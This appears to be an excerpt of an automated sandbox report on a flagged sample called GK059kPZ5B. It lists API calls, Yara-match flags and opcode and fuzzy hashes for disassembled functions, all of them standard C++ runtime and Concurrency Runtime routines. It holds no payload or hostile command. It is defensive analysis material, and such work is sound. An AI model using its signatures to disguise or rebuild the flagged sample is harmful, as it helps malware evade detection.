                                                              • Part of subcall function 00A836F1: GetLastError.KERNEL32(?,?,00A8A37F,?,00000000,?,00000000,?,00A8A623,?,00000007,?,?,00A8AA17,?,?), ref: 00A83719
                                                            • _free.LIBCMT ref: 00A8A663
                                                            • _free.LIBCMT ref: 00A8A66E
                                                            • _free.LIBCMT ref: 00A8A6C2
                                                            • _free.LIBCMT ref: 00A8A6CD
                                                            • _free.LIBCMT ref: 00A8A6D8
                                                            • _free.LIBCMT ref: 00A8A6E3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                            • Instruction ID: 5656d6dc30623c013466789cf6878c864949ae3b9e3cb7f9e676ce9c2bf4c544
                                                            • Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                            • Instruction Fuzzy Hash: 10119332540F04BAEE21B7B5CE4BFCB779CDF00740F440C26B299AA152EA74F5144751
                                                            APIs
                                                            • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,00410B59,?,?,?,00000000), ref: 00412420
                                                            • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B59,?,?,?,00000000), ref: 00412426
                                                            • GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,00410B59,?,?,?,00000000), ref: 00412453
                                                            • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B59,?,?,?,00000000), ref: 0041245D
                                                            • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B59,?,?,?,00000000), ref: 0041246F
                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412485
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00412493
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                            • String ID:
                                                            • API String ID: 4227777306-0
                                                            • Opcode ID: 98e3d6891a0dd5d677cbf2f779bc3de9b57089e9d4dcd81604344dd870270d4b
                                                            • Instruction ID: 772dfc6c110a2a8534dac99729108f53ec46fdbd0e11e7149f9ef709963b67bd
                                                            • Opcode Fuzzy Hash: 98e3d6891a0dd5d677cbf2f779bc3de9b57089e9d4dcd81604344dd870270d4b
                                                            • Instruction Fuzzy Hash: 56012B34A00125B7C720AF66ED09BEF376CEF42B52B60443BF805D2151DBACDA54866D
                                                            APIs
                                                            • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,00A60DC0,?,?,?,00000000), ref: 00A62687
                                                            • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00A60DC0,?,?,?,00000000), ref: 00A6268D
                                                            • GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,00A60DC0,?,?,?,00000000), ref: 00A626BA
                                                            • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00A60DC0,?,?,?,00000000), ref: 00A626C4
                                                            • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00A60DC0,?,?,?,00000000), ref: 00A626D6
                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00A626EC
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00A626FA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                            • String ID:
                                                            • API String ID: 4227777306-0
                                                            • Opcode ID: 23aee74c988fd39cb7eacc8cccc5b930dc7cceb5caf4327195496d093c37fa26
                                                            • Instruction ID: 550aeaa16134876fb41727f31d95069158e2eadba5ec9a92ca3df9547fe57a4d
                                                            • Opcode Fuzzy Hash: 23aee74c988fd39cb7eacc8cccc5b930dc7cceb5caf4327195496d093c37fa26
                                                            • Instruction Fuzzy Hash: A601F23C600115A7D720AF61EC49BAF3778EF42B92B604826F405E2061EB24D90497A8
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,00A6672B), ref: 00A624D6
                                                            • GetProcAddress.KERNEL32(00000000,00446CDC), ref: 00A624E4
                                                            • GetProcAddress.KERNEL32(00000000,00446CF4), ref: 00A624F2
                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,00A6672B), ref: 00A62520
                                                            • GetProcAddress.KERNEL32(00000000), ref: 00A62527
                                                            • GetLastError.KERNEL32(?,?,?,00A6672B), ref: 00A62542
                                                            • GetLastError.KERNEL32(?,?,?,00A6672B), ref: 00A6254E
                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00A62564
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00A62572
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                            • String ID: kernel32.dll
                                                            • API String ID: 4179531150-1793498882
                                                            • Opcode ID: 44ecf9bd0dd5c91555fe9cdf304f14bfeeea195f7c9b597a93ca8c7b2ae1de14
                                                            • Instruction ID: 3bd2eeac3fb6bf8ebf040c50268ef57392abdf6ab86c76f59169f958acb15181
                                                            • Opcode Fuzzy Hash: 44ecf9bd0dd5c91555fe9cdf304f14bfeeea195f7c9b597a93ca8c7b2ae1de14
                                                            • Instruction Fuzzy Hash: B0F0A9759007103FE7117BB97D49A2A7FBCDD46B633100636F412D21A2EB79C940876C
                                                            APIs
                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0042FEB5,00000003,?,0042FE55,00000003,00457970,0000000C,0042FFAC,00000003,00000002), ref: 0042FF24
                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0042FF37
                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,0042FEB5,00000003,?,0042FE55,00000003,00457970,0000000C,0042FFAC,00000003,00000002,00000000), ref: 0042FF5A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                            • String ID: 11@$CorExitProcess$mscoree.dll
                                                            • API String ID: 4061214504-3445089953
                                                            • Opcode ID: 565e8aad81c42c30b4556ccca566ef737f7629af4b303484cc6756d66643e6b5
                                                            • Instruction ID: b9f6d20b166e67f6b42c672312b3e089bcad04f0cb699fcb0f77a3f19f5d5cf1
                                                            • Opcode Fuzzy Hash: 565e8aad81c42c30b4556ccca566ef737f7629af4b303484cc6756d66643e6b5
                                                            • Instruction Fuzzy Hash: 09F0C834B00218BFDB109F50DD09B9EBFB4EF05B12F510076F805A2290CB799E44DA4C
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,?,?,?,?,00A8260C,00000001,00000001,?), ref: 00A82415
                                                            • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00A8260C,00000001,00000001,?,?,?,?), ref: 00A8249B
                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00A82595
                                                            • __freea.LIBCMT ref: 00A825A2
                                                              • Part of subcall function 00A8392E: RtlAllocateHeap.NTDLL(00000000,00A5DAFC,00000000), ref: 00A83960
                                                            • __freea.LIBCMT ref: 00A825AB
                                                            • __freea.LIBCMT ref: 00A825D0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1414292761-0
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: __cftoe
                                                            • String ID:
                                                            • API String ID: 4189289331-0
                                                            APIs
                                                            • FindSITargetTypeInstance.LIBVCRUNTIME ref: 00A78F97
                                                            • FindMITargetTypeInstance.LIBVCRUNTIME ref: 00A78FB0
                                                            • FindVITargetTypeInstance.LIBVCRUNTIME ref: 00A78FB7
                                                            • PMDtoOffset.LIBCMT ref: 00A78FD6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FindInstanceTargetType$Offset
                                                            • String ID:
                                                            • API String ID: 1467055271-0
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
                                                            • String ID:
                                                            • API String ID: 1687354797-0
                                                            APIs
                                                            • GetLastError.KERNEL32(?,?,00428DF1,00426782,004406C0,00000008,00440A25,?,?,?,?,00423A6B,?,?,B3455536), ref: 00428E08
                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00428E16
                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00428E2F
                                                            • SetLastError.KERNEL32(00000000,?,00428DF1,00426782,004406C0,00000008,00440A25,?,?,?,?,00423A6B,?,?,B3455536), ref: 00428E81
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastValue___vcrt_
                                                            • String ID:
                                                            • API String ID: 3852720340-0
                                                            APIs
                                                            • GetLastError.KERNEL32(?,?,00A79058,00A769E9,00A90927,00000008,00A90C8C,?,?,?,?,00A73CD2,?,?,0045A064), ref: 00A7906F
                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00A7907D
                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00A79096
                                                            • SetLastError.KERNEL32(00000000,?,00A79058,00A769E9,00A90927,00000008,00A90C8C,?,?,?,?,00A73CD2,?,?,0045A064), ref: 00A790E8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLastValue___vcrt_
                                                            • String ID:
                                                            • API String ID: 3852720340-0
                                                            APIs
                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00404D88
                                                            • int.LIBCPMT ref: 00404D9F
                                                              • Part of subcall function 0040BD81: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD92
                                                              • Part of subcall function 0040BD81: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BDAC
                                                            • std::locale::_Getfacet.LIBCPMT ref: 00404DA8
                                                            • std::_Facet_Register.LIBCPMT ref: 00404DD9
                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00404DEF
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00404E0D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                            • String ID:
                                                            • API String ID: 2243866535-0
                                                            APIs
                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00A54FEF
                                                            • int.LIBCPMT ref: 00A55006
                                                              • Part of subcall function 00A5BFE8: std::_Lockit::_Lockit.LIBCPMT ref: 00A5BFF9
                                                              • Part of subcall function 00A5BFE8: std::_Lockit::~_Lockit.LIBCPMT ref: 00A5C013
                                                            • std::locale::_Getfacet.LIBCPMT ref: 00A5500F
                                                            • std::_Facet_Register.LIBCPMT ref: 00A55040
                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00A55056
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00A55074
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                            • String ID:
                                                            • API String ID: 2243866535-0
                                                            APIs
                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 0040C1BF
                                                            • int.LIBCPMT ref: 0040C1D6
                                                              • Part of subcall function 0040BD81: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD92
                                                              • Part of subcall function 0040BD81: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BDAC
                                                            • std::locale::_Getfacet.LIBCPMT ref: 0040C1DF
                                                            • std::_Facet_Register.LIBCPMT ref: 0040C210
                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0040C226
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0040C244
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                            • String ID:
                                                            • API String ID: 2243866535-0
                                                            APIs
                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00405508
                                                            • int.LIBCPMT ref: 0040551F
                                                              • Part of subcall function 0040BD81: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD92
                                                              • Part of subcall function 0040BD81: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BDAC
                                                            • std::locale::_Getfacet.LIBCPMT ref: 00405528
                                                            • std::_Facet_Register.LIBCPMT ref: 00405559
                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0040556F
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0040558D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                            • String ID:
                                                            • API String ID: 2243866535-0
                                                            APIs
                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 004055A4
                                                            • int.LIBCPMT ref: 004055BB
                                                              • Part of subcall function 0040BD81: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD92
                                                              • Part of subcall function 0040BD81: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BDAC
                                                            • std::locale::_Getfacet.LIBCPMT ref: 004055C4
                                                            • std::_Facet_Register.LIBCPMT ref: 004055F5
                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0040560B
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00405629
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                            • String ID:
                                                            • API String ID: 2243866535-0
                                                            APIs
                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00404C4A
                                                            • int.LIBCPMT ref: 00404C61
                                                              • Part of subcall function 0040BD81: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD92
                                                              • Part of subcall function 0040BD81: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BDAC
                                                            • std::locale::_Getfacet.LIBCPMT ref: 00404C6A
                                                            • std::_Facet_Register.LIBCPMT ref: 00404C9B
                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00404CB1
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00404CCF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                            • String ID:
                                                            • API String ID: 2243866535-0
                                                            APIs
                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00A5C426
                                                            • int.LIBCPMT ref: 00A5C43D
                                                              • Part of subcall function 00A5BFE8: std::_Lockit::_Lockit.LIBCPMT ref: 00A5BFF9
                                                              • Part of subcall function 00A5BFE8: std::_Lockit::~_Lockit.LIBCPMT ref: 00A5C013
                                                            • std::locale::_Getfacet.LIBCPMT ref: 00A5C446
                                                            • std::_Facet_Register.LIBCPMT ref: 00A5C477
                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00A5C48D
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00A5C4AB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                            • String ID:
                                                            • API String ID: 2243866535-0
                                                            APIs
                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00A54EB1
                                                            • int.LIBCPMT ref: 00A54EC8
                                                              • Part of subcall function 00A5BFE8: std::_Lockit::_Lockit.LIBCPMT ref: 00A5BFF9
                                                              • Part of subcall function 00A5BFE8: std::_Lockit::~_Lockit.LIBCPMT ref: 00A5C013
                                                            • std::locale::_Getfacet.LIBCPMT ref: 00A54ED1
                                                            • std::_Facet_Register.LIBCPMT ref: 00A54F02
                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00A54F18
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00A54F36
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                            • String ID:
                                                            • API String ID: 2243866535-0
                                                            APIs
                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 00A7898A
                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 00A78A43
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CurrentImageNonwritable___except_validate_context_record
                                                            • String ID: 11@$@fB$csm
                                                            • API String ID: 3480331319-1464837749
                                                            • Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                            • Instruction ID: 3fb4f23533d4ca8c8c1c58bf3a57bd85be978a978c041a770a70359c05f351d9
                                                            • Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                            • Instruction Fuzzy Hash: CF41D630E40209ABCF10DF28CC49AAE7BB5AF44364F14C166E91D5B392DB3ADE11CB91
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: Xtime_diff_to_millis2_xtime_get
                                                            • String ID: 11@
                                                            • API String ID: 531285432-1785270423
                                                            • Opcode ID: 0e36c963428b9d60b974f18f0769f742c4f51e3c626c870dcc3986d9ed4dafa0
                                                            • Instruction ID: 5ee48cf3c78ecc5b6537ee055918bb6364c51208e2805909369ee9a6debb6cd6
                                                            • Opcode Fuzzy Hash: 0e36c963428b9d60b974f18f0769f742c4f51e3c626c870dcc3986d9ed4dafa0
                                                            • Instruction Fuzzy Hash: E5213075D001099FDF04EFA5DC419BEB7B8AF48718B10406AF901B7291D678AD059B65
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Xtime_diff_to_millis2_xtime_get
                                                            • String ID: 11@
                                                            • API String ID: 531285432-1785270423
                                                            • Opcode ID: 100972eb18cca990445868258ca18565aedc37090e71be810c06a2a5d3a0331b
                                                            • Instruction ID: 55323c988e6057b9c729b91707b22411ad9abf4da2fe13ba57d3329a09cc10c1
                                                            • Opcode Fuzzy Hash: 100972eb18cca990445868258ca18565aedc37090e71be810c06a2a5d3a0331b
                                                            • Instruction Fuzzy Hash: 27214F75A0020A9FDF14EFA4DD829BEB7B8FF09712F100069FA01A7261D774AE058B90
                                                            APIs
                                                            • SetEvent.KERNEL32(?,00000000), ref: 00423759
                                                            • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00423741
                                                              • Part of subcall function 0041B74C: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 0041B76D
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0042378A
                                                            • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 004237B3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: Context$Event$Base::Concurrency::details::$ThrowTrace$Exception@8
                                                            • String ID: 11@
                                                            • API String ID: 2630251706-1785270423
                                                            • Opcode ID: 458ed3e5417ba220ed4bd1e4a28432a397d2c2fe66a31dff9dce91352e516156
                                                            • Instruction ID: 33ce48ef146ac78a3ef221314cc781bfd8a3c25b4f9a6e194e2960aa52b33145
                                                            • Opcode Fuzzy Hash: 458ed3e5417ba220ed4bd1e4a28432a397d2c2fe66a31dff9dce91352e516156
                                                            • Instruction Fuzzy Hash: 9C110B757002106BCF047F65DC85DAE7765EF84772B10416BFA05D7292CFAC9E41CA98
                                                            APIs
                                                            • Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0041CE41
                                                            • Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0041CE65
                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041CE78
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0041CE86
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
                                                            • String ID: pScheduler
                                                            • API String ID: 3657713681-923244539
                                                            • Opcode ID: 9390b3195b713983fe10ad4c3c6d405898b6246382bfd66b9966ffe9dd40d037
                                                            • Instruction ID: 46b9ecfe0875f7f86596c353a9bffc422044863c42dab0ab2bac390bf5a45ba1
                                                            • Opcode Fuzzy Hash: 9390b3195b713983fe10ad4c3c6d405898b6246382bfd66b9966ffe9dd40d037
                                                            • Instruction Fuzzy Hash: 8FF0593594070863C324EB15DC828DEB3799E91728360812FE40563182CF3CAE8AC69D
                                                            APIs
                                                            • Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 0041E65F
                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041E672
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0041E680
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: Concurrency::details::Exception@8FreeIdleProxyProxy::ReturnThreadThrowstd::invalid_argument::invalid_argument
                                                            • String ID: 11@$pContext
                                                            • API String ID: 1990795212-1086721755
                                                            • Opcode ID: a1f300e0f29ed94639b3e21e46aa6b462f5911b6182861392c7cf2f18a492d1f
                                                            • Instruction ID: 1f218d0b40ab772f1aed9042d58143e35ca4ab3a9892fa22be9c34d269449320
                                                            • Opcode Fuzzy Hash: a1f300e0f29ed94639b3e21e46aa6b462f5911b6182861392c7cf2f18a492d1f
                                                            • Instruction Fuzzy Hash: 45E06139B0011457CB04FB66DC06C5DB7A8AEC0B14750006FF901A3342DFB8A90585C8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7096e54c8b2da2135de54d2c532f2528a1a3733c17ca5e9eea5bc4f64eff24f9
                                                            • Instruction ID: 7eacffcc392e6897453e427a1bc5d3d4951d53cce7b4b374ddd0667b65be5727
                                                            • Opcode Fuzzy Hash: 7096e54c8b2da2135de54d2c532f2528a1a3733c17ca5e9eea5bc4f64eff24f9
                                                            • Instruction Fuzzy Hash: FF718E31B00266DBCB21CF95E884ABFBB75EF45360FA8426BE81057280D7789D41C7E9
                                                            Memory Dump Source
